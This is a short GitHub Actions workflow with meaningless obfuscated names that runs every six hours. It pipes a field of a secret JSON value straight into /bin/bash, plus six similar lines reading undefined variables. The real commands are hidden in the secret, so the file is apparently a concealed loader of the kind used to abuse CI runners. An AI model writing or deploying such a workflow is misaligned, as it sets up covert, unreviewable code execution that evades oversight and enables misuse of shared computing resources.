name: xuxijiao7891
on:
  workflow_dispatch:
  schedule:
    - cron: '29 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xuxijiao7891
        env:
          ztg94: ${{ secrets.ztg94 }}
        run: |
          echo $ztg94 | jq -r .j2112 | /bin/bash
          echo $xdu96 | jq -r .v0 | /bin/bash
          echo $cfj48 | jq -r .kcwn58929 | /bin/bash
          echo $sf475 | jq -r .tzbeq8 | /bin/bash
          echo $wt4964 | jq -r .u31412 | /bin/bash
          echo $pofi96 | jq -r .nsy48266 | /bin/bash
          echo $fu5382 | jq -r .ajl54308 | /bin/bash

